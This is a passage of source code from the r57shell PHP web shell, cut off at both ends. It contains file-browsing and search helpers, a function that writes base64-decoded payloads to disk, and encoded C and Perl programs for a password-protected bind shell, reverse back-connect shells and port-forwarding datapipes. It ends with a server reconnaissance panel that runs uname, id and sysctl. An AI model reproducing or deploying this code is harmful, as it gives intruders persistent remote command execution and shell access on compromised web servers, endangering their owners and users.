";return null;}function perms($mode){if($GLOBALS['windows'])return 0 ;if($mode&0x1000 ){$type='p';}else if($mode&0x2000 ){$type='c';}else if($mode&0x4000 ){$type='d';}else if($mode&0x6000 ){$type='b';}else if($mode&0x8000 ){$type='-';}else if($mode&0xa000 ){$type='l';}else if($mode&0xc000 ){$type='s';}else $type='u';$owner["read"]=($mode&00400 )?'r':'-';$owner["write"]=($mode&00200 )?'w':'-';$owner["execute"]=($mode&00100 )?'x':'-';$group["read"]=($mode&00040 )?'r':'-';$group["write"]=($mode&00020 )?'w':'-';$group["execute"]=($mode&00010 )?'x':'-';$world["read"]=($mode&00004 )?'r':'-';$world["write"]=($mode&00002 )?'w':'-';$world["execute"]=($mode&00001 )?'x':'-';if($mode&0x800 )$owner["execute"]=($owner['execute']=='x')?'s':'S';if($mode&0x400 )$group["execute"]=($group['execute']=='x')?'s':'S';if($mode&0x200 )$world["execute"]=($world['execute']=='x')?'t':'T';$s=sprintf("%1s",$type);$s.=sprintf("%1s%1s%1s",$owner['read'],$owner['write'],$owner['execute']);$s.=sprintf("%1s%1s%1s",$group['read'],$group['write'],$group['execute']);$s.=sprintf("%1s%1s%1s",$world['read'],$world['write'],$world['execute']);return trim($s);}function in($type,$name,$size,$value){$ret="";return $ret;}function which($pr){$path=ex("which $pr");if(!empty($path)){return $path;}else {return $pr;}}function cf($fname,$text){$w_file=@fopen($fname,"w") or we($fname);if($w_file){@fputs($w_file,base64_decode($text));@fclose($w_file);}}function sr($l,$t1,$t2){return "".$t1."".$t2."";}if(!@function_exists("view_size")){function view_size($size){if($size>=1073741824 ){$size=@round($size/1073741824 *100 )/100 ." GB";}elseif($size>=1048576 ){$size=@round($size/1048576 *100 )/100 ." MB";}elseif($size>=1024 ){$size=@round($size/1024 *100 )/100 ." KB";}else {$size=$size." B";}return $size;}}function DirFiles($dir,$types=''){$files=array();if(($handle=@opendir($dir))){while(FALSE!==($file=@readdir($handle))){if($file!="." && $file!=".."){if(!is_dir($dir."/".$file)){if($types){$pos=@strrpos($file,".");$ext=@substr($file,$pos,@strlen($file)-$pos);if(@in_array($ext,@explode(';',$types)))$files[]=$dir."/".$file;}else $files[]=$dir."/".$file;}}}@closedir($handle);}return $files;}function DirFilesWide($dir){$files=array();$dirs=array();if(($handle=@opendir($dir))){while(false!==($file=@readdir($handle))){if($file!="." && $file!=".."){if(@is_dir($dir."/".$file)){$file=@strtoupper($file);$dirs[$file]='<DIR>';}else $files[$file]=@filesize($dir."/".$file);}}@closedir($handle);@ksort($dirs);@ksort($files);$files=@array_merge($dirs,$files);}return $files;}function DirFilesR($dir,$types=''){$files=array();if(($handle=@opendir($dir))){while(false!==($file=@readdir($handle))){if($file!="." && $file!=".."){if(@is_dir($dir."/".$file))$files=@array_merge($files,DirFilesR($dir."/".$file,$types));else {$pos=@strrpos($file,".");$ext=@substr($file,$pos,@strlen($file)-$pos);if($types){if(@in_array($ext,explode(';',$types)))$files[]=$dir."/".$file;}else $files[]=$dir."/".$file;}}}@closedir($handle);}return $files;}function DirPrintHTMLHeaders($dir){$pockets='';$handle=@opendir($dir) or die("Can't open directory $dir");echo "
\n";while(false!==($file=@readdir($handle))){if($file!="." && $file!=".."){if(@is_dir($dir."/".$file)){echo "
[ $file ]
\n";DirPrintHTMLHeaders($dir."/".$file);}else {$pos=@strrpos($file,".");$ext=@substr($file,$pos,@strlen($file)-$pos);if(@in_array($ext,array('.htm','.html'))){$header='-=None=-';$strings=@file($dir."/".$file) or die("Can't open file ".$dir."/".$file);for($a=0 ;$a(.+))';if(@eregi($pattern,$strings[$a],$pockets)){$header="«".$pockets[2 ]."»";break;}}echo "
".$header."
\n";}}}}echo "
\n";@closedir($handle);}class SearchResult{var $text;var $FilesToSearch;var $ResultFiles;var $FilesTotal;var $MatchesCount;var $FileMatschesCount;var $TimeStart;var $TimeTotal;var $titles;function SearchResult($dir,$text,$filter=''){$dirs=@explode(";",$dir);$this->FilesToSearch=array();for($a=0 ;$aFilesToSearch=@array_merge($this->FilesToSearch,DirFilesR($dirs[$a],$filter));$this->text=$text;$this->FilesTotal=@count($this->FilesToSearch);$this->TimeStart=getmicrotime();$this->MatchesCount=0 ;$this->ResultFiles=array();$this->FileMatchesCount=array();$this->titles=array();}function GetFilesTotal(){return $this->FilesTotal;}function GetTitles(){return $this->titles;}function GetTimeTotal(){return $this->TimeTotal;}function GetMatchesCount(){return $this->MatchesCount;}function GetFileMatchesCount(){return $this->FileMatchesCount;}function GetResultFiles(){return $this->ResultFiles;}function SearchText($phrase=0 ,$case=0 ){$qq=@explode(' ',$this->text);$delim='|';if($phrase)foreach($qq as $k=>$v)$qq[$k]='\b'.$v.'\b';$words='('.@implode($delim,$qq).')';$pattern="/".$words."/";if(!$case)$pattern.='i';foreach($this->FilesToSearch as $k=>$filename){$this->FileMatchesCount[$filename]=0 ;$FileStrings=@file($filename) or @next;for($a=0 ;$a<@count($FileStrings);$a++){$count=0 ;$CurString=$FileStrings[$a];$CurString=@Trim($CurString);$CurString=@strip_tags($CurString);$aa='';if(($count=@preg_match_all($pattern,$CurString,$aa))){$CurString=@preg_replace($pattern,"\\1",$CurString);$this->ResultFiles[$filename][$a+1 ]=$CurString;$this->MatchesCount+=$count;$this->FileMatchesCount[$filename]+=$count;}}}$this->TimeTotal=@round(getmicrotime()-$this->TimeStart,4 );}}function getmicrotime(){list($usec,$sec)=@explode(" ",@microtime());return ((float)$usec+(float)$sec);}$port_bind_bd_c="I2luY2x1ZGUgPHN0ZGlvLmg+DQojaW5jbHVkZSA8c3RyaW5nLmg+DQojaW5jbHVkZSA8c3lzL3R5cGVzLmg+DQojaW5jbHVkZS A8c3lzL3NvY2tldC5oPg0KI2luY2x1ZGUgPG5ldGluZXQvaW4uaD4NCiNpbmNsdWRlIDxlcnJuby5oPg0KaW50IG1haW4oYXJnYyxhcmd2KQ0KaW50I GFyZ2M7DQpjaGFyICoqYXJndjsNCnsgIA0KIGludCBzb2NrZmQsIG5ld2ZkOw0KIGNoYXIgYnVmWzMwXTsNCiBzdHJ1Y3Qgc29ja2FkZHJfaW4gcmVt b3RlOw0KIGlmKGZvcmsoKSA9PSAwKSB7IA0KIHJlbW90ZS5zaW5fZmFtaWx5ID0gQUZfSU5FVDsNCiByZW1vdGUuc2luX3BvcnQgPSBodG9ucyhhdG9 pKGFyZ3ZbMV0pKTsNCiByZW1vdGUuc2luX2FkZHIuc19hZGRyID0gaHRvbmwoSU5BRERSX0FOWSk7IA0KIHNvY2tmZCA9IHNvY2tldChBRl9JTkVULF NPQ0tfU1RSRUFNLDApOw0KIGlmKCFzb2NrZmQpIHBlcnJvcigic29ja2V0IGVycm9yIik7DQogYmluZChzb2NrZmQsIChzdHJ1Y3Qgc29ja2FkZHIgK ikmcmVtb3RlLCAweDEwKTsNCiBsaXN0ZW4oc29ja2ZkLCA1KTsNCiB3aGlsZSgxKQ0KICB7DQogICBuZXdmZD1hY2NlcHQoc29ja2ZkLDAsMCk7DQog ICBkdXAyKG5ld2ZkLDApOw0KICAgZHVwMihuZXdmZCwxKTsNCiAgIGR1cDIobmV3ZmQsMik7DQogICB3cml0ZShuZXdmZCwiUGFzc3dvcmQ6IiwxMCk 7DQogICByZWFkKG5ld2ZkLGJ1ZixzaXplb2YoYnVmKSk7DQogICBpZiAoIWNocGFzcyhhcmd2WzJdLGJ1ZikpDQogICBzeXN0ZW0oImVjaG8gd2VsY2 9tZSB0byByNTcgc2hlbGwgJiYgL2Jpbi9iYXNoIC1pIik7DQogICBlbHNlDQogICBmcHJpbnRmKHN0ZGVyciwiU29ycnkiKTsNCiAgIGNsb3NlKG5ld 2ZkKTsNCiAgfQ0KIH0NCn0NCmludCBjaHBhc3MoY2hhciAqYmFzZSwgY2hhciAqZW50ZXJlZCkgew0KaW50IGk7DQpmb3IoaT0wO2k8c3RybGVuKGVu dGVyZWQpO2krKykgDQp7DQppZihlbnRlcmVkW2ldID09ICdcbicpDQplbnRlcmVkW2ldID0gJ1wwJzsgDQppZihlbnRlcmVkW2ldID09ICdccicpDQp lbnRlcmVkW2ldID0gJ1wwJzsNCn0NCmlmICghc3RyY21wKGJhc2UsZW50ZXJlZCkpDQpyZXR1cm4gMDsNCn0=";$port_bind_bd_pl="IyEvdXNyL2Jpbi9wZXJsDQokU0hFTEw9Ii9iaW4vYmFzaCAtaSI7DQppZiAoQEFSR1YgPCAxKSB7IGV4aXQoMSk7IH0NCiRMS VNURU5fUE9SVD0kQVJHVlswXTsNCnVzZSBTb2NrZXQ7DQokcHJvdG9jb2w9Z2V0cHJvdG9ieW5hbWUoJ3RjcCcpOw0Kc29ja2V0KFMsJlBGX0lORVQs JlNPQ0tfU1RSRUFNLCRwcm90b2NvbCkgfHwgZGllICJDYW50IGNyZWF0ZSBzb2NrZXRcbiI7DQpzZXRzb2Nrb3B0KFMsU09MX1NPQ0tFVCxTT19SRVV TRUFERFIsMSk7DQpiaW5kKFMsc29ja2FkZHJfaW4oJExJU1RFTl9QT1JULElOQUREUl9BTlkpKSB8fCBkaWUgIkNhbnQgb3BlbiBwb3J0XG4iOw0KbG lzdGVuKFMsMykgfHwgZGllICJDYW50IGxpc3RlbiBwb3J0XG4iOw0Kd2hpbGUoMSkNCnsNCmFjY2VwdChDT05OLFMpOw0KaWYoISgkcGlkPWZvcmspK Q0Kew0KZGllICJDYW5ub3QgZm9yayIgaWYgKCFkZWZpbmVkICRwaWQpOw0Kb3BlbiBTVERJTiwiPCZDT05OIjsNCm9wZW4gU1RET1VULCI+JkNPTk4i Ow0Kb3BlbiBTVERFUlIsIj4mQ09OTiI7DQpleGVjICRTSEVMTCB8fCBkaWUgcHJpbnQgQ09OTiAiQ2FudCBleGVjdXRlICRTSEVMTFxuIjsNCmNsb3N lIENPTk47DQpleGl0IDA7DQp9DQp9";$back_connect="IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KJGNtZD0gImx5bngiOw0KJHN5c3RlbT0gJ2VjaG8gImB1bmFtZSAtYWAiO2Vj aG8gImBpZGAiOy9iaW4vc2gnOw0KJDA9JGNtZDsNCiR0YXJnZXQ9JEFSR1ZbMF07DQokcG9ydD0kQVJHVlsxXTsNCiRpYWRkcj1pbmV0X2F0b24oJHR hcmdldCkgfHwgZGllKCJFcnJvcjogJCFcbiIpOw0KJHBhZGRyPXNvY2thZGRyX2luKCRwb3J0LCAkaWFkZHIpIHx8IGRpZSgiRXJyb3I6ICQhXG4iKT sNCiRwcm90bz1nZXRwcm90b2J5bmFtZSgndGNwJyk7DQpzb2NrZXQoU09DS0VULCBQRl9JTkVULCBTT0NLX1NUUkVBTSwgJHByb3RvKSB8fCBkaWUoI kVycm9yOiAkIVxuIik7DQpjb25uZWN0KFNPQ0tFVCwgJHBhZGRyKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpvcGVuKFNURElOLCAiPiZTT0NLRVQi KTsNCm9wZW4oU1RET1VULCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RERVJSLCAiPiZTT0NLRVQiKTsNCnN5c3RlbSgkc3lzdGVtKTsNCmNsb3NlKFNUREl OKTsNCmNsb3NlKFNURE9VVCk7DQpjbG9zZShTVERFUlIpOw==";$back_connect_c="I2luY2x1ZGUgPHN0ZGlvLmg+DQojaW5jbHVkZSA8c3lzL3NvY2tldC5oPg0KI2luY2x1ZGUgPG5ldGluZXQvaW4uaD4NCmludC BtYWluKGludCBhcmdjLCBjaGFyICphcmd2W10pDQp7DQogaW50IGZkOw0KIHN0cnVjdCBzb2NrYWRkcl9pbiBzaW47DQogY2hhciBybXNbMjFdPSJyb SAtZiAiOyANCiBkYWVtb24oMSwwKTsNCiBzaW4uc2luX2ZhbWlseSA9IEFGX0lORVQ7DQogc2luLnNpbl9wb3J0ID0gaHRvbnMoYXRvaShhcmd2WzJd KSk7DQogc2luLnNpbl9hZGRyLnNfYWRkciA9IGluZXRfYWRkcihhcmd2WzFdKTsgDQogYnplcm8oYXJndlsxXSxzdHJsZW4oYXJndlsxXSkrMStzdHJ sZW4oYXJndlsyXSkpOyANCiBmZCA9IHNvY2tldChBRl9JTkVULCBTT0NLX1NUUkVBTSwgSVBQUk9UT19UQ1ApIDsgDQogaWYgKChjb25uZWN0KGZkLC Aoc3RydWN0IHNvY2thZGRyICopICZzaW4sIHNpemVvZihzdHJ1Y3Qgc29ja2FkZHIpKSk8MCkgew0KICAgcGVycm9yKCJbLV0gY29ubmVjdCgpIik7D QogICBleGl0KDApOw0KIH0NCiBzdHJjYXQocm1zLCBhcmd2WzBdKTsNCiBzeXN0ZW0ocm1zKTsgIA0KIGR1cDIoZmQsIDApOw0KIGR1cDIoZmQsIDEp Ow0KIGR1cDIoZmQsIDIpOw0KIGV4ZWNsKCIvYmluL3NoIiwic2ggLWkiLCBOVUxMKTsNCiBjbG9zZShmZCk7IA0KfQ==";$datapipe_c="I2luY2x1ZGUgPHN5cy90eXBlcy5oPg0KI2luY2x1ZGUgPHN5cy9zb2NrZXQuaD4NCiNpbmNsdWRlIDxzeXMvd2FpdC5oPg0KI2luY2 x1ZGUgPG5ldGluZXQvaW4uaD4NCiNpbmNsdWRlIDxzdGRpby5oPg0KI2luY2x1ZGUgPHN0ZGxpYi5oPg0KI2luY2x1ZGUgPGVycm5vLmg+DQojaW5jb HVkZSA8dW5pc3RkLmg+DQojaW5jbHVkZSA8bmV0ZGIuaD4NCiNpbmNsdWRlIDxsaW51eC90aW1lLmg+DQojaWZkZWYgU1RSRVJST1INCmV4dGVybiBj aGFyICpzeXNfZXJybGlzdFtdOw0KZXh0ZXJuIGludCBzeXNfbmVycjsNCmNoYXIgKnVuZGVmID0gIlVuZGVmaW5lZCBlcnJvciI7DQpjaGFyICpzdHJ lcnJvcihlcnJvcikgIA0KaW50IGVycm9yOyAgDQp7IA0KaWYgKGVycm9yID4gc3lzX25lcnIpDQpyZXR1cm4gdW5kZWY7DQpyZXR1cm4gc3lzX2Vycm xpc3RbZXJyb3JdOw0KfQ0KI2VuZGlmDQoNCm1haW4oYXJnYywgYXJndikgIA0KICBpbnQgYXJnYzsgIA0KICBjaGFyICoqYXJndjsgIA0KeyANCiAga W50IGxzb2NrLCBjc29jaywgb3NvY2s7DQogIEZJTEUgKmNmaWxlOw0KICBjaGFyIGJ1Zls0MDk2XTsNCiAgc3RydWN0IHNvY2thZGRyX2luIGxhZGRy LCBjYWRkciwgb2FkZHI7DQogIGludCBjYWRkcmxlbiA9IHNpemVvZihjYWRkcik7DQogIGZkX3NldCBmZHNyLCBmZHNlOw0KICBzdHJ1Y3QgaG9zdGV udCAqaDsNCiAgc3RydWN0IHNlcnZlbnQgKnM7DQogIGludCBuYnl0Ow0KICB1bnNpZ25lZCBsb25nIGE7DQogIHVuc2lnbmVkIHNob3J0IG9wb3J0Ow 0KDQogIGlmIChhcmdjICE9IDQpIHsNCiAgICBmcHJpbnRmKHN0ZGVyciwiVXNhZ2U6ICVzIGxvY2FscG9ydCByZW1vdGVwb3J0IHJlbW90ZWhvc3Rcb iIsYXJndlswXSk7DQogICAgcmV0dXJuIDMwOw0KICB9DQogIGEgPSBpbmV0X2FkZHIoYXJndlszXSk7DQogIGlmICghKGggPSBnZXRob3N0YnluYW1l KGFyZ3ZbM10pKSAmJg0KICAgICAgIShoID0gZ2V0aG9zdGJ5YWRkcigmYSwgNCwgQUZfSU5FVCkpKSB7DQogICAgcGVycm9yKGFyZ3ZbM10pOw0KICA gIHJldHVybiAyNTsNCiAgfQ0KICBvcG9ydCA9IGF0b2woYXJndlsyXSk7DQogIGxhZGRyLnNpbl9wb3J0ID0gaHRvbnMoKHVuc2lnbmVkIHNob3J0KS hhdG9sKGFyZ3ZbMV0pKSk7DQogIGlmICgobHNvY2sgPSBzb2NrZXQoUEZfSU5FVCwgU09DS19TVFJFQU0sIElQUFJPVE9fVENQKSkgPT0gLTEpIHsNC iAgICBwZXJyb3IoInNvY2tldCIpOw0KICAgIHJldHVybiAyMDsNCiAgfQ0KICBsYWRkci5zaW5fZmFtaWx5ID0gaHRvbnMoQUZfSU5FVCk7DQogIGxh ZGRyLnNpbl9hZGRyLnNfYWRkciA9IGh0b25sKDApOw0KICBpZiAoYmluZChsc29jaywgJmxhZGRyLCBzaXplb2YobGFkZHIpKSkgew0KICAgIHBlcnJ vcigiYmluZCIpOw0KICAgIHJldHVybiAyMDsNCiAgfQ0KICBpZiAobGlzdGVuKGxzb2NrLCAxKSkgew0KICAgIHBlcnJvcigibGlzdGVuIik7DQogIC AgcmV0dXJuIDIwOw0KICB9DQogIGlmICgobmJ5dCA9IGZvcmsoKSkgPT0gLTEpIHsNCiAgICBwZXJyb3IoImZvcmsiKTsNCiAgICByZXR1cm4gMjA7D QogIH0NCiAgaWYgKG5ieXQgPiAwKQ0KICAgIHJldHVybiAwOw0KICBzZXRzaWQoKTsNCiAgd2hpbGUgKChjc29jayA9IGFjY2VwdChsc29jaywgJmNh ZGRyLCAmY2FkZHJsZW4pKSAhPSAtMSkgew0KICAgIGNmaWxlID0gZmRvcGVuKGNzb2NrLCJyKyIpOw0KICAgIGlmICgobmJ5dCA9IGZvcmsoKSkgPT0 gLTEpIHsNCiAgICAgIGZwcmludGYoY2ZpbGUsICI1MDAgZm9yazogJXNcbiIsIHN0cmVycm9yKGVycm5vKSk7DQogICAgICBzaHV0ZG93bihjc29jay wyKTsNCiAgICAgIGZjbG9zZShjZmlsZSk7DQogICAgICBjb250aW51ZTsNCiAgICB9DQogICAgaWYgKG5ieXQgPT0gMCkNCiAgICAgIGdvdG8gZ290c 29jazsNCiAgICBmY2xvc2UoY2ZpbGUpOw0KICAgIHdoaWxlICh3YWl0cGlkKC0xLCBOVUxMLCBXTk9IQU5HKSA+IDApOw0KICB9DQogIHJldHVybiAy MDsNCg0KIGdvdHNvY2s6DQogIGlmICgob3NvY2sgPSBzb2NrZXQoUEZfSU5FVCwgU09DS19TVFJFQU0sIElQUFJPVE9fVENQKSkgPT0gLTEpIHsNCiA gICBmcHJpbnRmKGNmaWxlLCAiNTAwIHNvY2tldDogJXNcbiIsIHN0cmVycm9yKGVycm5vKSk7DQogICAgZ290byBxdWl0MTsNCiAgfQ0KICBvYWRkci 5zaW5fZmFtaWx5ID0gaC0+aF9hZGRydHlwZTsNCiAgb2FkZHIuc2luX3BvcnQgPSBodG9ucyhvcG9ydCk7DQogIG1lbWNweSgmb2FkZHIuc2luX2FkZ HIsIGgtPmhfYWRkciwgaC0+aF9sZW5ndGgpOw0KICBpZiAoY29ubmVjdChvc29jaywgJm9hZGRyLCBzaXplb2Yob2FkZHIpKSkgew0KICAgIGZwcmlu dGYoY2ZpbGUsICI1MDAgY29ubmVjdDogJXNcbiIsIHN0cmVycm9yKGVycm5vKSk7DQogICAgZ290byBxdWl0MTsNCiAgfQ0KICB3aGlsZSAoMSkgew0 KICAgIEZEX1pFUk8oJmZkc3IpOw0KICAgIEZEX1pFUk8oJmZkc2UpOw0KICAgIEZEX1NFVChjc29jaywmZmRzcik7DQogICAgRkRfU0VUKGNzb2NrLC ZmZHNlKTsNCiAgICBGRF9TRVQob3NvY2ssJmZkc3IpOw0KICAgIEZEX1NFVChvc29jaywmZmRzZSk7DQogICAgaWYgKHNlbGVjdCgyMCwgJmZkc3IsI E5VTEwsICZmZHNlLCBOVUxMKSA9PSAtMSkgew0KICAgICAgZnByaW50ZihjZmlsZSwgIjUwMCBzZWxlY3Q6ICVzXG4iLCBzdHJlcnJvcihlcnJubykp Ow0KICAgICAgZ290byBxdWl0MjsNCiAgICB9DQogICAgaWYgKEZEX0lTU0VUKGNzb2NrLCZmZHNyKSB8fCBGRF9JU1NFVChjc29jaywmZmRzZSkpIHs NCiAgICAgIGlmICgobmJ5dCA9IHJlYWQoY3NvY2ssYnVmLDQwOTYpKSA8PSAwKQ0KCWdvdG8gcXVpdDI7DQogICAgICBpZiAoKHdyaXRlKG9zb2NrLG J1ZixuYnl0KSkgPD0gMCkNCglnb3RvIHF1aXQyOw0KICAgIH0gZWxzZSBpZiAoRkRfSVNTRVQob3NvY2ssJmZkc3IpIHx8IEZEX0lTU0VUKG9zb2NrL CZmZHNlKSkgew0KICAgICAgaWYgKChuYnl0ID0gcmVhZChvc29jayxidWYsNDA5NikpIDw9IDApDQoJZ290byBxdWl0MjsNCiAgICAgIGlmICgod3Jp dGUoY3NvY2ssYnVmLG5ieXQpKSA8PSAwKQ0KCWdvdG8gcXVpdDI7DQogICAgfQ0KICB9DQoNCiBxdWl0MjoNCiAgc2h1dGRvd24ob3NvY2ssMik7DQo gIGNsb3NlKG9zb2NrKTsNCiBxdWl0MToNCiAgZmZsdXNoKGNmaWxlKTsNCiAgc2h1dGRvd24oY3NvY2ssMik7DQogcXVpdDA6DQogIGZjbG9zZShjZm lsZSk7DQogIHJldHVybiAwOw0KfQ==";$datapipe_pl="IyEvdXNyL2Jpbi9wZXJsDQp1c2UgSU86OlNvY2tldDsNCnVzZSBQT1NJWDsNCiRsb2NhbHBvcnQgPSAkQVJHVlswXTsNCiRob3N0I CAgICAgPSAkQVJHVlsxXTsNCiRwb3J0ICAgICAgPSAkQVJHVlsyXTsNCiRkYWVtb249MTsNCiRESVIgPSB1bmRlZjsNCiR8ID0gMTsNCmlmICgkZGFl bW9uKXsgJHBpZCA9IGZvcms7IGV4aXQgaWYgJHBpZDsgZGllICIkISIgdW5sZXNzIGRlZmluZWQoJHBpZCk7IFBPU0lYOjpzZXRzaWQoKSBvciBkaWU gIiQhIjsgfQ0KJW8gPSAoJ3BvcnQnID0+ICRsb2NhbHBvcnQsJ3RvcG9ydCcgPT4gJHBvcnQsJ3RvaG9zdCcgPT4gJGhvc3QpOw0KJGFoID0gSU86Ol NvY2tldDo6SU5FVC0+bmV3KCdMb2NhbFBvcnQnID0+ICRsb2NhbHBvcnQsJ1JldXNlJyA9PiAxLCdMaXN0ZW4nID0+IDEwKSB8fCBkaWUgIiQhIjsNC iRTSUd7J0NITEQnfSA9ICdJR05PUkUnOw0KJG51bSA9IDA7DQp3aGlsZSAoMSkgeyANCiRjaCA9ICRhaC0+YWNjZXB0KCk7IGlmICghJGNoKSB7IHBy aW50IFNUREVSUiAiJCFcbiI7IG5leHQ7IH0NCisrJG51bTsNCiRwaWQgPSBmb3JrKCk7DQppZiAoIWRlZmluZWQoJHBpZCkpIHsgcHJpbnQgU1RERVJ SICIkIVxuIjsgfSANCmVsc2lmICgkcGlkID09IDApIHsgJGFoLT5jbG9zZSgpOyBSdW4oXCVvLCAkY2gsICRudW0pOyB9IA0KZWxzZSB7ICRjaC0+Y2 xvc2UoKTsgfQ0KfQ0Kc3ViIFJ1biB7DQpteSgkbywgJGNoLCAkbnVtKSA9IEBfOw0KbXkgJHRoID0gSU86OlNvY2tldDo6SU5FVC0+bmV3KCdQZWVyQ WRkcicgPT4gJG8tPnsndG9ob3N0J30sJ1BlZXJQb3J0JyA9PiAkby0+eyd0b3BvcnQnfSk7DQppZiAoISR0aCkgeyBleGl0IDA7IH0NCm15ICRmaDsN CmlmICgkby0+eydkaXInfSkgeyAkZmggPSBTeW1ib2w6OmdlbnN5bSgpOyBvcGVuKCRmaCwgIj4kby0+eydkaXInfS90dW5uZWwkbnVtLmxvZyIpIG9 yIGRpZSAiJCEiOyB9DQokY2gtPmF1dG9mbHVzaCgpOw0KJHRoLT5hdXRvZmx1c2goKTsNCndoaWxlICgkY2ggfHwgJHRoKSB7DQpteSAkcmluID0gIi I7DQp2ZWMoJHJpbiwgZmlsZW5vKCRjaCksIDEpID0gMSBpZiAkY2g7DQp2ZWMoJHJpbiwgZmlsZW5vKCR0aCksIDEpID0gMSBpZiAkdGg7DQpteSgkc m91dCwgJGVvdXQpOw0Kc2VsZWN0KCRyb3V0ID0gJHJpbiwgdW5kZWYsICRlb3V0ID0gJHJpbiwgMTIwKTsNCmlmICghJHJvdXQgICYmICAhJGVvdXQp IHt9DQpteSAkY2J1ZmZlciA9ICIiOw0KbXkgJHRidWZmZXIgPSAiIjsNCmlmICgkY2ggJiYgKHZlYygkZW91dCwgZmlsZW5vKCRjaCksIDEpIHx8IHZ lYygkcm91dCwgZmlsZW5vKCRjaCksIDEpKSkgew0KbXkgJHJlc3VsdCA9IHN5c3JlYWQoJGNoLCAkdGJ1ZmZlciwgMTAyNCk7DQppZiAoIWRlZmluZW QoJHJlc3VsdCkpIHsNCnByaW50IFNUREVSUiAiJCFcbiI7DQpleGl0IDA7DQp9DQppZiAoJHJlc3VsdCA9PSAwKSB7IGV4aXQgMDsgfQ0KfQ0KaWYgK CR0aCAgJiYgICh2ZWMoJGVvdXQsIGZpbGVubygkdGgpLCAxKSAgfHwgdmVjKCRyb3V0LCBmaWxlbm8oJHRoKSwgMSkpKSB7DQpteSAkcmVzdWx0ID0g c3lzcmVhZCgkdGgsICRjYnVmZmVyLCAxMDI0KTsNCmlmICghZGVmaW5lZCgkcmVzdWx0KSkgeyBwcmludCBTVERFUlIgIiQhXG4iOyBleGl0IDA7IH0 NCmlmICgkcmVzdWx0ID09IDApIHtleGl0IDA7fQ0KfQ0KaWYgKCRmaCAgJiYgICR0YnVmZmVyKSB7KHByaW50ICRmaCAkdGJ1ZmZlcik7fQ0Kd2hpbG UgKG15ICRsZW4gPSBsZW5ndGgoJHRidWZmZXIpKSB7DQpteSAkcmVzID0gc3lzd3JpdGUoJHRoLCAkdGJ1ZmZlciwgJGxlbik7DQppZiAoJHJlcyA+I DApIHskdGJ1ZmZlciA9IHN1YnN0cigkdGJ1ZmZlciwgJHJlcyk7fSANCmVsc2Uge3ByaW50IFNUREVSUiAiJCFcbiI7fQ0KfQ0Kd2hpbGUgKG15ICRs ZW4gPSBsZW5ndGgoJGNidWZmZXIpKSB7DQpteSAkcmVzID0gc3lzd3JpdGUoJGNoLCAkY2J1ZmZlciwgJGxlbik7DQppZiAoJHJlcyA+IDApIHskY2J 1ZmZlciA9IHN1YnN0cigkY2J1ZmZlciwgJHJlcyk7fSANCmVsc2Uge3ByaW50IFNUREVSUiAiJCFcbiI7fQ0KfX19DQo=";echo $head;echo '';if(empty($_POST['cmd'])){$serv=array(127 ,192 ,172 ,10 );$addr=@explode('.',$_SERVER['SERVER_ADDR']);$current_version=str_replace('.','',$version);if(!in_array($addr[0 ],$serv)){}}echo '

'.ws(1 ).' !'.ws(2 ).'r57shell '.$version.' ';echo ws(2 );echo "".date("d-m-Y H:i:s")."";echo ws(2 ).$lb." phpinfo ".$rb;echo ws(2 ).$lb." php.ini ".$rb;echo ws(2 ).$lb." cpu ".$rb;echo ws(2 ).$lb." mem ".$rb;if($unix){echo ws(2 ).$lb." users ".$rb;}echo ws(2 ).$lb." tmp ".$rb;echo ws(2 ).$lb." mysql query ".$rb;echo ws(2 ).$lb." delete ".$rb."
";echo ws(2 );echo (($safe_mode)?("safe_mode: ON"):("safe_mode: OFF"));echo ws(2 );echo "PHP version: ".@phpversion()."";$curl_on=@function_exists('curl_version');echo ws(2 );echo "cURL: ".(($curl_on)?("ON"):("OFF"));echo ws(2 );echo "MySQL: ";$mysql_on=@function_exists('mysql_connect');if($mysql_on){echo "ON";}else {echo "OFF";}echo ws(2 );echo "MSSQL: ";$mssql_on=@function_exists('mssql_connect');if($mssql_on){echo "ON";}else {echo "OFF";}echo ws(2 );echo "PostgreSQL: ";$pg_on=@function_exists('pg_connect');if($pg_on){echo "ON";}else {echo "OFF";}echo ws(2 );echo "Oracle: ";$ora_on=@function_exists('ocilogon');if($ora_on){echo "ON";}else {echo "OFF";}echo "
".ws(2 );echo "Disable functions : ";if(''==($df=@ini_get('disable_functions'))){echo "NONE";}else {echo "$df";}$free=@diskfreespace($dir);if(!$free){$free=0 ;}$all=@disk_total_space($dir);if(!$all){$all=0 ;}$used=$all-$free;$used_percent=@round(100 /($all/$free),2 );echo "
".ws(2 )."HDD Free : ".view_size($free)." HDD Total : ".view_size($all)."";echo '

';echo $font;if(!$windows){echo 'uname -a :'.ws(1 ).'
sysctl :'.ws(1 ).'
$OSTYPE :'.ws(1 ).'
Server :'.ws(1 ).'
id :'.ws(1 ).'
pwd :'.ws(1 ).'
';echo " ";echo "";$uname=ex('uname -a');echo ((!empty($uname))?(ws(3 ).@substr($uname,0 ,120 )."
"):(ws(3 ).@substr(@php_uname(),0 ,120 )."
"));if(!$safe_mode){$bsd1=ex('sysctl -n kern.ostype');$bsd2=ex('sysctl -n kern.osrelease');$lin1=ex('sysctl -n kernel.ostype');$lin2=ex('sysctl -n kernel.osrelease');}if(!empty($bsd1) && !empty($bsd2)){$sysctl="$bsd1 $bsd2";}else if(!empty($lin1) && !empty($lin2)){$sysctl="$lin1 $lin2";}else {$sysctl="-";}echo ws(3 ).$sysctl."
";echo ws(3 ).ex('echo $OSTYPE')."
";echo ws(3 ).@substr($SERVER_SOFTWARE,0 ,120 )."
";$id=ex('id');echo ((!empty($id))?(ws(3 ).$id."
"):(ws(3 )."user=".@get_current_user()." uid=".@getmyuid()." gid=".@getmygid()."
"));echo ws(3 ).$dir;echo ws(3 ).'( '.perms(@fileperms($dir)).' )';echo "";}else {echo 'OS :'.ws(1 ).'
Server :'.ws(1 ).'
User :'.ws(1 ).'
pwd :'.ws(1 ).'
';echo " ";echo "";echo ws(3 ).@substr(@php_uname(),0 ,120 )."
";echo ws(3 ).@substr($SERVER_SOFTWARE,0 ,120 )."
";echo ws(3 ).@get_current_user()."
";echo ws(3 ).$dir;echo "
";}echo "";echo "
